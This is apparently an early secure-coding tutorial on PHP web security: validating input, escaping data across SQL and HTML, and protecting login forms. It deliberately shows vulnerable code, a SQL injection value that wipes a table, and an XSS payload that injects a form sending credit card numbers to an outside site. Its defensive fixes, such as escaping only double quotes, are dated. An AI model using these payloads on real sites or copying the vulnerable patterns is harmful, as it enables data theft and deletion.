picture of Spencer
Trust is everything in this day and age. You have to trust a lot of people, from the guy who gives you directions to your local plumber. After all, you're not always the authority. However, when developing applications for the web, you must assume the role of authority. Otherwise, the user will assume the role, which is a big gamble: total data integrity, data corruption, or diversion of data -- if the user is the authority, you don't know what the results will be.
We blame a lot of problems on "bad code". However, bad code isn't necessarily written with malicious intent; good code can go bad through simple misunderstandings and misuse of technologies. Three basic steps can be taken to avoid creating bad code. The first step is ensuring that you can trust your input. The next step is manipulating that input data carefully. The final step is providing the appropriate people with secure, reliable access to that data.

Verify That Your Input Is Correct

Never trust the input you receive from someone else. You want your data to have perfect integrity, within the limits that you establish. If you write a routine that saves someone's address to your database, don't trust your routine to magically fix user error. Only you can make that happen.
Lets write some quick code to save those addresses:

<?php

function saveAddress($dbh,$firstName,$lastName,$streetAddress,$city,$zip) {
    
$stmt=OCIPrepare($dbh,"
        Insert into addressBook
            (firstName,lastName,streetAddress,city,zip)
        values
            ('$firstName','$lastName','$streetAddress','$city','$zip')"
);
    
OCIExecute($stmt);        
}
    
?>
So what happens if someone leaves the ZIP code out? What if they put "pr0nd00d" as their ZIP code? Do not trust your input. Some might argue that these checks should be done before this function. Well, what if your co-worker, Billy Bob, reuses this function? Now he has to do the checks too. And don't trust he'll do it, either. Billy Bob is a lazy man, and not too smart in the first place.
So let's define a function to make sure the ZIP code is right. After all, my zip code is not "I like cheese."

<?php

function validZipCode($zip) { 
    return(
ereg("^[[:digit:]]{5}(-[[:digit:]]{4})?$",$zip)); 
}
    
?>
The validZipCode() function takes a zip code and does a regular expression match against it. If it $zip begins with 5 digits, with an optional dash and 4 digit extension, return 1. Else return 0. Now, l ets integrate it with our current function.

<?php

function saveAddress($dbh,$firstName,$lastName,$streetAddress,$city,$zip) {
    if(!
validZipCode($zip))
        return(
0);
    
$stmt=OCIPrepare($dbh,"
        Insert into addressBook
            (firstName,lastName,streetAddress,city,zip)
        values
            ('$firstName','$lastName','$streetAddress','$city','$zip')"
);
    
OCIExecute($stmt);
    Return(
1);
}

?>
Now our current function requires a valid ZIP code. It won't accept a blank one, nor a non-USA one. (Note that our function doesn't simply require a non-blank string -- that would be A Bad Thing(tm).) If a ZIP isn't passed, our function returns a 0. But wait...we can reword the logic so that when valid ZipCode() returns a 0, an array or string can be returned with a more descriptive error.

<?php

If(!validZipCode($zip))
    
push_array($errors,"Invalid zip code.");
If(!
validStreetAddress($streetAddress))
    
push_array($errors,"Invalid address.");

?>
Etc...
Adding the validation functions is an exercise left to the user. Some things may not be economically or technologically feasible, as you cannot always afford to verify information beyond a certain point. For example, it would be too slow to confirm every bit of the input from the one hundred addresses per second you get. However, a simple check like the one outlined above, makes it MUCH harder to have data that doesn't make sense. After all, we know that valid U.S. ZIP codes are numeric and how long they can be, so why accept data that's obviously wrong?

Manipulating Your Input

This is a more subtle problem for those who may not fully understand every detail of what they are doing. Good data manipulation is a matter of watching what you do and how you do it, because this is where hackers and crackers can have a field day.
In our original function, there is a statement:

<?php

OCIPrepare
($dbh,"
    Insert into addressBook
        (firstName,lastName,streetAddress,city,zip)
    values
        ('$firstName','$lastName','$streetAddress','$city','$zip')"
);

?>
Bob O'Connor is a candidate to have his address saved in our table address book. The string in which the SQL is parsed now contains "... ('Bob','O'Connor', ...." You may see the error now. That single quote in "O'Connor" needs to be escaped. The oracle way is to turn "O'Connor" into "O''Connor", by replacing all single apostrophes with two apostrophes.
Bob O'Connor probably doesn't care how you deal with this situation, but let's think about the hacker and/or cracker who will love you for a statement like:
delete from addressBook where lastName=$lastname
What if $lastname="'' or 1"? Now our statement looks like:
delete from addressBook where lastName='' or 1
Everything out of your address book has now successfully been deleted. It is now time to break out the 40gig backup tapes.
Just because one language (like PHP) can take your input without a problem, don't assume that another language (like SQL) will happily accept the same input. This is not a matter of coding for what you want to happen: it is a matter of coding for what you don't want to happen. Escape your characters if you are using more than one language interpreter. If you are using PHP to evaluate dynamic PHP via eval(), don't assume that the variables you use to construct the dynamic PHP will be sane.
One more example. Here's a simple piece of HTML and PHP which does something neat.
<?php

if($CC) {
    
save($CC);
    
header("Location: <https://www.mystore.com/my.php>");
    exit();
}
        
?>
<form method="post" action="my.php">
Input your CC number to pay for your purchase.<br>
<input type="text" name="CC" value="<?php echo $CC; ?>"><br>
<input type="submit" value="Show me the money!">
</form>
A piece of code to save your credit card number, but with one faux pas: I didn't check to be sure $CC is valid before trying to save! But save($CC) should check to make sure it's getting valid input, as well. Let's assume the spec for save($CC) is: if the $CC is valid, it is saved; else, an error is returned. So let's change our code to correspond with that spec.

<?php

if(save($CC)) {
    
header("Location: ....");
    exit;
}
    
?>
So now if $CC is invalid, our little input tag does something cool. It lets the user see and correct his mistake!
<input type="text" name="CC" value="<?php echo $CC; ?>">
Remember what I said about coding in one language to output to another? This example is vulnerable to cross-site scripting. (This is when you input your own script code as input to another program and the result returned is a page that now does something else -- something the programmer never intended.) A hacker/cracker might input the following for $CC...watch the exact characters used:
"></form><form action=<http://www.mycompetitor.com/haha.cgi>>
Input your CC again for validation purposes: 
<input name="CC"><input type=submit></form><!-
Don't worry how the person managed to fit all of this into our program. Now our web page will look like this after PHP gets to it:
<form method="post" action="my.php">
Input your CC number to pay for your purchase.
<input type="text" name="CC" value=""></form><form 
action=<http://www.mycompetitor.com/haha.cgi>>Input your CC again for validation 
purposes: <input name="CC"><input type=submit></form><!-">
<input type="submit" value="Show me the money!">
</form>
This is a very simple hack and slash example, but our page will now have two input fields. The first goes nowhere since the submit button isn't within the <form></form> tags. The second sends the credit card number to another site! The rest of the HTML is blanked out after the second closing form tag. A quick and nasty hack, eh? We can beautify this further, but the point here is to show that you should never trust your input. HTML is taking input from PHP.
How to prevent this? A line before or during printing:

<?php

$CC
=ereg_replace("\"","&quot;",$CC);

?>
Now if some evil person tries the above malicious code, or even a simple:
"><input type="submit" value="DIE!
This will output:
<form method="post" action="my.php">
Input your CC number to pay for your purchase.
<input type="text" name="CC" value=""><input 
type="submit" value="DIE!">
<input type="submit" value="Show me the money!">
</form>
Annoying to anyone who views it? Yes. Dangerous to your customers? Definitely not. The value in the input field is practically garbage. In fact, you might get a phone call about someone at haha@malicious.com </ym/Compose?To=haha@malicious.com&YY=7178&order=down&sort=date&pos=0> sending you such things. What you do to Mr. "haha" is entirely up to you.

How To Access Your Data

Now all your code is cross-script proof and saving proper data. Time to make your site public, right? This is another time where you should think twice. For example, your customers are logging into your site to use your two-click purchase (patent pending) fork-in-a-box (patent pending) e-commerce site. You do one of these for a front page:
<form method="get" action="account.php">
ID: <input type="text" name="id">
Password: <input type="password" name="password">
</form>
See the first problem? To submit to your account page, a URL is constructed to pass the variables, like so:
<http://www.forkinabox.com/account.php?id=me&password=ilikecheese>
In the worst case scenario, the password is sent in plain text, saved in the browser's history, sent to a proxy and saved in the proxy log, and saved in the webserver's access log. Using the POST method makes things a little (not much) more secure, but someone who is persistent enough can even fake a form using the POST method.
Since we are using the GET method to get the variables into PHP in the prior example, anyone can try an infinite number of IDs and passwords. (Microsoft suffered this one with their passport system a while back.) Instead of GET, use $HTTP_POST_VARS[] for information that is vital for access or needs to be secure for other reasons. The rest of the time you can use the GET method -- most of the time a search term doesn't have to be kept secret.
Since it is possible for someone in the network to be sniffing for clear-text (non-encrypted) data, using https (SSL) will encrypt the remaining data to make it more secure. It is possible to break this kind of encryption, but at present it takes someone with a lot of computing power to decrypt your data and fake input to your forms. [Insert your favorite conspiracy theory here.]
But let's say that we want to be slick and bypass PHP. (That's the reason why we're writing bad code, no?) Checking with JavaScript for valid input or even a valid user and password has been done. But then what happens when I turn off JavaScript?
Don't depend on JavaScript for anything more important than user convenience. You can cache data with it, make pretty things with it, use it to do fast checks for invalid data, but don't depend on JavaScript to get proper input to your server. As soon as the user turns it off, your authentication and data checking are out the door. You can speed up the data checking and shave some processing time off the server, but, users can turn it off. I know I do!
This article may be in three parts, but it has one point in mind: Never trust anything that you don't have control over. Don't trust the input to your functions, the data used to generate pages, nor the network. This means check your input when it comes in, clean the input for further use, and access it in a sane (and maybe even secure) fashion. The more authority you take, the less chance the user can be malicious.
-- Spencer